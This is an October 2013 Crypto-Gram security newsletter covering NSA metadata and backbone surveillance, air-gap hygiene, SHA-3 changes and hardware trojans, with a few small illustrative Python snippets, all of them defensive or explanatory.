When the government collects metadata on people, the government puts them under surveillance. When the government collects metadata on the entire country, they put everyone under surveillance. When Google does it, they do the same thing. Metadata equals surveillance; it’s that simple.
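
If that still sounds abstract, consider how little code it takes to turn a pile of phone records into a picture of someone’s life. A minimal sketch with invented records; note that no call contents appear anywhere:

    # Reconstructing someone's life from nothing but phone metadata.
    # The records are invented for illustration.
    from collections import Counter

    # (caller, callee, timestamp, cell tower): classic metadata.
    records = [
        ("alice", "oncologist",     "2013-10-01 09:05", "tower-downtown"),
        ("alice", "oncologist",     "2013-10-03 16:40", "tower-downtown"),
        ("alice", "divorce-lawyer", "2013-10-04 12:15", "tower-midtown"),
        ("alice", "mom",            "2013-10-04 20:02", "tower-home"),
    ]

    contacts = Counter(callee for _, callee, _, _ in records)
    places = Counter(tower for *_, tower in records)

    print("Who Alice talks to:", contacts.most_common())
    print("Where Alice spends time:", places.most_common())

We never heard a word Alice said, but we know she’s seeing an oncologist and a divorce lawyer. That’s surveillance.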

Debunking the “it’s just metadata” myth:
http://www.wired.com/opinion/2013/06/…
http://www.theguardian.com/technology/2013/jun/21/…
https://www.eff.org/deeplinks/2013/06/…
http://www.techdirt.com/articles/20130708/…
https://www.aclu.org/blog/…
http://www.newyorker.com/online/blogs/newsdesk/2013/…
http://arstechnica.com/tech-policy/2013/08/…
http://kieranhealy.org/blog/archives/2013/06/09/…
http://www.cato.org/blog/…

According to Snowden, the administration is partially basing its bulk collection of metadata on an interpretation of Section 215 of the Patriot Act.
http://i2.cdn.turner.com/cnn/2013/images/08/09/…


Senator Feinstein Admits the NSA Taps the Internet Backbone

We know from the Snowden documents (and other sources) that the NSA taps the Internet backbone through secret agreements with major US telcos, but the US government still hasn’t admitted it.

In late August, the Obama administration declassified a ruling from the Foreign Intelligence Surveillance Court. Footnote 3 reads:

The term ‘upstream collection’ refers to NSA’s interception of Internet communications as they transit [LONG REDACTED CLAUSE], [REDACTED], rather than to acquisitions directly from Internet service providers such as [LIST OF REDACTED THINGS, PRESUMABLY THE PRISM DOWNSTREAM COMPANIES].

Here’s one analysis of the document.

On Thursday, Senator Dianne Feinstein filled in some of the details:

Upstream collection…occurs when NSA obtains internet communications, such as e-mails, from certain US companies that operate the Internet background [sic, she means “backbone”], i.e., the companies that own and operate the domestic telecommunications lines over which internet traffic flows.

Note that we knew this in 2006:

One thing the NSA wanted was access to the growing fraction of global telecommunications that passed through junctions on U.S. territory. According to former senator Bob Graham (D-Fla.), who chaired the Intelligence Committee at the time, briefers told him in Cheney’s office in October 2002 that Bush had authorized the agency to tap into those junctions. That decision, Graham said in an interview first reported in The Washington Post on Dec. 18, allowed the NSA to intercept “conversations that . . . went through a transit facility inside the United States.”

And this in 2007:

[The Program] requires the NSA, as noted by Rep. Peter Hoekstra, “to steal light off of different cables” in order to acquire the “information that’s most important to us” Interview with Rep. Peter Hoekstra by Paul Gigot, Lack of Intelligence: Congress Dawdles on Terrorist Wiretapping, JOURNAL EDITORIAL REPORT, FOX NEWS CHANNEL (Aug. 6, 2007) at 2.

So we knew it already, but now we know it even more. So why won’t President Obama admit it?

What we know from 2013:
http://www.theguardian.com/world/2013/jun/08/…
http://www.nytimes.com/2013/08/08/us/…
http://online.wsj.com/article_email/…
http://online.wsj.com/article/…

FISC ruling:
https://www.fas.org/irp/agency/doj/fisa/fisc0912.pdf
http://sealedabstract.com/rants/…

Feinstein quote:
http://www.c-spanvideo.org/clip/4466341

What we knew in 2006:
http://www.washingtonpost.com/wp-dyn/content/…

What we knew in 2007:
https://www.eff.org/sites/default/files/filenode/…

President Obama refuses to admit it:
https://www.cdt.org/pr_statement/…

Another article on this:
https://www.techdirt.com/articles/20130927/…

Mark Klein in 2006:
https://www.eff.org/files/filenode/att/presskit/…


NSA Storing Internet Data, Social Networking Data, on Pretty Much Everybody

There are two new stories based on the Snowden documents.

This is getting silly. General Alexander just lied about this to Congress last week. The old NSA tactic of hiding behind a shell game of different code names is failing. It used to be they could get away with saying “Project X doesn’t do that,” knowing full well that Projects Y and Z did and that no one would call them on it. Now they’re just looking shiftier and shiftier.

The program the New York Times exposed is basically Total Information Awareness, which Congress defunded in 2003 because it was just too damned creepy. Now it’s back. (Actually, it never really went away. It just changed code names.)

I’m also curious how all those PRISM-era denials from Internet companies about the NSA not having “direct access” to their servers jibe with this paragraph:

The overall volume of metadata collected by the N.S.A. is reflected in the agency’s secret 2013 budget request to Congress. The budget document, disclosed by Mr. Snowden, shows that the agency is pouring money and manpower into creating a metadata repository capable of taking in 20 billion “record events” daily and making them available to N.S.A. analysts within 60 minutes.

Honestly, I think the details matter less and less. We have to assume that the NSA has everyone who uses electronic communications under constant surveillance. New details about hows and whys will continue to emerge—for example, now we know the NSA’s repository contains travel data—but the big picture will remain the same.

The stories:
http://www.nytimes.com/2013/09/29/us/…
http://www.theguardian.com/world/2013/sep/30/…

Alexander lying about this:
https://www.eff.org/deeplinks/2013/09/…

PRISM denials:
http://techcrunch.com/2013/06/06/…
http://www.theguardian.com/world/2013/jun/07/…

We’re under constant surveillance:
https://www.schneier.com/blog/archives/2013/09/…

NSA collecting travel data:
http://papersplease.org/wp/2013/09/29/…


News

The Chaos Computer Club successfully hacked the iPhone fingerprint reader.
https://www.schneier.com/blog/archives/2013/09/…

Interesting paper: “Three Paradoxes of Big Data,” by Neil M. Richards and Jonathan H. King, Stanford Law Review Online, 2013.
http://papers.ssrn.com/sol3/papers.cfm?…
http://www.stanfordlawreview.org/online/…

A 3D-printed robot can break Android PINs by brute force. The attack works because Android doesn’t impose increasingly long delays between PIN attempts after a run of unsuccessful ones; the iPhone does.
http://mashable.com/2013/07/25/3d-printed-robot-pin/
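
The arithmetic behind that design decision is simple. A back-of-the-envelope calculation, with the attempt rate and delay schedule invented for illustration:

    # Why lockout delays matter for 4-digit PINs. Rates are invented.
    pins = 10 ** 4      # 10,000 possible 4-digit PINs
    rate = 1.5          # seconds per robot attempt, no delays
    print("no backoff: %.1f hours" % (pins * rate / 3600))  # ~4.2 hours

    # With a one-hour lockout after the first ten failures, roughly
    # the iPhone's approach, the same search takes over a year:
    locked = 10 * rate + (pins - 10) * 3600
    print("hourly lockouts: %.0f days" % (locked / 86400))  # ~416 days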

ICANN has a draft study that looks at abuse of the Whois database.
http://www.icann.org/en/news/announcements/…
http://www.lightbluetouchpaper.org/2013/09/25/…

“When everything is classified, then nothing is classified.”
http://www2.gwu.edu/~nsarchiv/NSAEBB/NSAEBB48/…

Gabriella Coleman has published an interesting analysis of the hacker group Anonymous.
http://www.cigionline.org/publications/2013/9/…

Details of how the FBI found the administrator of Silk Road, a popular black market e-commerce site. It was bad operational security.
http://arstechnica.com/security/2013/10/…
We already know that it is next to impossible to maintain privacy and anonymity against a well-funded government adversary.
https://www.schneier.com/essay-418.html
Another article:
http://www.slate.com/blogs/crime/2013/10/02/…

Is cybersecurity a profession? A National Academy of Sciences panel says no.
http://www.nap.edu/catalog.php?record_id=18446
http://www.csoonline.com/article/740456/…

Interesting: a matchstick-sized acoustic sensor that can be attached to drones.
https://www.schneier.com/blog/archives/2013/10/…

This is a new postal privacy product. The idea is basically to use indirection to hide physical addresses. You would get a random number to give to your correspondents, and the post office would use that number to determine your real address. No security against government surveillance, but potentially valuable nonetheless.
https://www.schneier.com/blog/archives/2013/10/…

There’s a serious random-number generation flaw in the cryptographic systems used to protect the Taiwanese digital ID.
http://arstechnica.com/security/2013/09/…
http://smartfacts.cr.yp.to/smartfacts-20130916.pdf

Build your own Enigma.
http://www.instructables.com/id/…

Azerbaijan achieves a new low in voter fraud. The government accidentally publishes the results of the election before the polls open.
https://www.schneier.com/blog/archives/2013/10/…

The NSA has the ability to fingerprint burner phones by querying the call-record database.
https://www.schneier.com/blog/archives/2013/10/…

Insecurities in the Linux /dev/random.
http://eprint.iacr.org/2013/338.pdf

Massive MIMO cryptosystem:
http://arxiv.org/abs/1310.1861
MIMO stands for “multiple-input multiple-output.” I had to look that up. In general, I’m not optimistic about the security of these sorts of systems. Whenever non-cryptographers come up with cryptographic algorithms based on some novel problem that’s hard in their area of research, invariably there are pretty easy cryptographic attacks. So consider this a good research exercise for all budding cryptanalysts out there.

SafeSlinger: a new secure smartphone app.
https://www.schneier.com/blog/archives/2013/10/…


Air Gaps

Since I started working with Snowden’s documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use—or should use—air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they’re hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that’s not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there’s the potential for attack.

And air gaps *have* been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Chinese in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden’s NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

1. When you set up your computer, connect it to the Internet as little as possible. It’s impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend’s network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of *that* to the air gap machine using a one-way process.)

2. Install the minimum software set you need to do your job, and disable all operating system services that you won’t need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That’s all. (No, I don’t have any inside knowledge about TrueCrypt, and there’s a lot about it that makes me suspicious. But for Windows full-disk encryption it’s that, Microsoft’s BitLocker, or Symantec’s PGPDisk—and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn’t get turned on by accident.

4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it’s an attempt to make it harder for the attacker to target your computer.

5. Turn off all autorun features. This should be standard practice for all the computers you own, but it’s especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don’t worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You’re not on the Internet, after all.

7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don’t know—or one you find in a parking lot.

8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can’t spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you’ve only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation—not read *or* write; I’ve got one of those—wins a prize.

9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files. If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can’t break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale. (A short script for the padding step appears after this list.)

10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you’ll be moving public files and it won’t matter, but sometimes you won’t be, and it will. And if you’re using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don’t forget to encrypt the computer as well; whole-disk encryption is the best.
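
Rule 9’s padding step is easy to script. A minimal sketch; pass it the transfer device’s mount point, e.g. fill_device("/media/usb"):

    # Fill a transfer device's free space with random junk files,
    # leaving no room for exfiltrated data.
    import os

    def fill_device(mount_point, chunk=1024 * 1024):
        n = 0
        try:
            while True:
                path = os.path.join(mount_point, "pad-%04d.bin" % n)
                with open(path, "wb") as f:
                    f.write(os.urandom(chunk))  # 1 MB of random data
                n += 1
        except OSError:
            # The device is full: exactly the state we want.
            print("wrote %d padding files" % n)

If padding files later disappear, or files you didn’t put there appear, you have a problem.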

One thing I didn’t do, although it’s worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD—you can keep your data on an encrypted USB stick—is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it’s probably impossible to enforce for any network more complicated than a single computer with a single user. But if you’re thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you’re going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that’s too much paranoia for me right now.

This essay previously appeared on Wired.com.
http://www.wired.com/opinion/2013/10/149481/

Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

My previous advice:
https://www.schneier.com/essay-450.html

Bin Laden had an air gap:
https://www.schneier.com/blog/archives/2011/05/…

agent.btz:
http://www.washingtonpost.com/national/…

TrueCrypt:
http://www.truecrypt.org/

BleachBit:
http://bleachbit.sourceforge.net/

People plugging in found USB drives:
https://www.schneier.com/blog/archives/2012/07/…

Tails:
https://tails.boum.org/


Will Keccak = SHA-3?

Last year, NIST selected Keccak as the winner of the SHA-3 hash function competition. Yes, I would rather my own Skein had won, but Keccak was a good choice.

But last August, John Kelsey announced some changes to Keccak in a talk (slides 44-48 are relevant). Basically, the capacity levels were reduced in the name of software performance, and that affects security. One of Keccak’s nice features is that it’s highly tunable.
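
For the non-cryptographers: Keccak is a sponge function with a 1600-bit internal state split between a rate r, the bits processed per call of the permutation, which determines speed, and a capacity c, which determines security, with r + c = 1600 and generic security of roughly c/2 bits. That’s the tunability, and it’s also why cutting capacity cuts security. A quick illustration; the capacity values here are examples, not NIST’s exact proposal:

    # The sponge trade-off in Keccak: rate + capacity = 1600 bits.
    # Generic security is about capacity/2 bits; throughput scales
    # with rate. Capacity values are illustrative.
    STATE = 1600

    for capacity in (1024, 576, 512, 256):
        rate = STATE - capacity
        print("c=%4d: ~%3d-bit generic security, %4d bits per permutation"
              % (capacity, capacity // 2, rate))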

Normally, this wouldn’t be a big deal. But in light of the Snowden documents that reveal that the NSA has attempted to intentionally weaken cryptographic standards, this is a huge deal.

To be sure, I do not believe that the NIST changes were suggested by the NSA. Nor do I believe that the changes make the algorithm easier to break by the NSA. I believe NIST made the changes in good faith, and the result is a better security/performance trade-off. My problem with the changes isn’t cryptographic, it’s perceptual. There is so little trust in the NSA right now, and that mistrust is reflecting on NIST. I worry that the changed algorithm won’t be accepted by an understandably skeptical security community, and that no one (except those forced) will use SHA-3 as a result.

This is a lousy outcome. NIST has done a great job with cryptographic competitions: both a decade ago with AES and now with SHA-3. This is just another effect of the NSA’s actions draining the trust out of the Internet.

At this point, NIST simply has to standardize on Keccak as submitted and as selected.

Kelsey’s talk:
https://docs.google.com/file/d/…

NSA weakening cryptography:
http://www.nytimes.com/2013/09/06/us/…

Too much mistrust:
https://www.schneier.com/essay-447.html

CDT’s post on this:
https://www.cdt.org/blogs/joseph-lorenzo-hall/…

Slashdot thread:
http://yro.slashdot.org/story/13/09/28/0219235/…

Response from the Keccak team:
http://keccak.noekeon.org/yes_this_is_keccak.html


Schneier News

I spoke at TEDxCambridge last month on security and power. Here’s the video. I am *very* happy with it. It’s only 12 minutes long, and I packed a lot into that time.
http://www.youtube.com/watch?v=h0d_QDgl3gI

I was interviewed for Technology Review on the NSA and the Snowden documents.
http://www.technologyreview.com/news/519336/…

My picture on a “trust the math” T-shirt.
http://www.zerodayclothing.com/products/…

This is a video of me talking about surveillance and privacy, both relating to the NSA and surveillance more generally. It’s from a conference at EPFL in Lausanne, Switzerland.
http://slideshot.epfl.ch/play/cops_schneier
http://www.youtube.com/watch?v=Skr-jIqISO0

This is a Tumblr feed on things I say. I have nothing to do with it.
http://shitthatschneiersays.tumblr.com/


Google Knows Every Wi-Fi Password in the World

This article points out that as people log into Wi-Fi networks from their Android phones, and back up those passwords along with everything else to Google’s cloud, Google is amassing an enormous database of the world’s Wi-Fi passwords. And while it’s not every Wi-Fi password in the world, it’s almost certainly a large percentage of them.

Leaving aside Google’s intentions regarding this database, it is certainly something that the US government could force Google to turn over with a National Security Letter.

Something else to think about.

http://blogs.computerworld.com/android/22806/…


Surreptitiously Tampering with Computer Chips

This is really interesting research: “Stealthy Dopant-Level Hardware Trojans.” Basically, you can tamper with a logic gate to be either stuck-on or stuck-off by changing the doping of one transistor. This sort of sabotage is undetectable by functional testing or optical inspection. And it can be done at mask generation—very late in the design process—since it does not require adding circuits, changing the circuit layout, or anything else. All this makes it *really* hard to detect.

The paper talks about several uses for this type of sabotage, but the most interesting—and devastating—is to modify a chip’s random number generator. This technique could, for example, reduce the amount of entropy in Intel’s hardware random number generator from 128 bits to 32 bits. This could be done without triggering any of the built-in self-tests, without disabling any of the built-in self-tests, and without failing any randomness tests.

I have no idea if the NSA convinced Intel to do this with the hardware random number generator it embedded into its CPU chips, but I do know that it could. And I was always leery of Intel strongly pushing for applications to use the output of its hardware RNG directly and not putting it through some strong software PRNG like Fortuna. And now Theodore Ts’o writes this about Linux: “I am so glad I resisted pressure from Intel engineers to let /dev/random rely only on the RDRAND instruction.”
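
The defense Ts’o is describing is cheap to illustrate. Here is a minimal sketch of the mixing idea, not the actual /dev/random or Fortuna code: never expose raw hardware-RNG output; hash it together with other entropy sources, so a sabotaged source can only hurt you if every source is bad:

    # Defensive RNG mixing (illustrative only). A backdoored hardware
    # source can't control the output unless it can also predict the
    # other inputs to the hash.
    import hashlib, os, time

    def hardware_rng(n):
        # Stand-in for RDRAND output; assume it may be sabotaged.
        return os.urandom(n)

    def mixed_random(n=32):
        h = hashlib.sha256()
        h.update(hardware_rng(32))   # the suspect source
        h.update(os.urandom(32))     # the OS entropy pool
        h.update(str(time.perf_counter_ns()).encode())  # timing jitter
        return h.digest()[:n]

    print(mixed_random().hex())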

Yes, this is a conspiracy theory. But I’m not willing to discount such things anymore. That’s the worst thing about the NSA’s actions. We have no idea whom we can trust.

Research paper:
http://people.umass.edu/gbecker/BeckerChes13.pdf

Fortuna:
https://en.wikipedia.org/wiki/Fortuna_%28PRNG%29

Ts’o’s essay:
https://plus.google.com/117091380454742934025/posts/…

We don’t know who to trust anymore:
https://www.schneier.com/essay-435.html
https://www.schneier.com/essay-447.html


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <http://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT—formerly British Telecom. See <http://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of BT.

Copyright (c) 2013 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.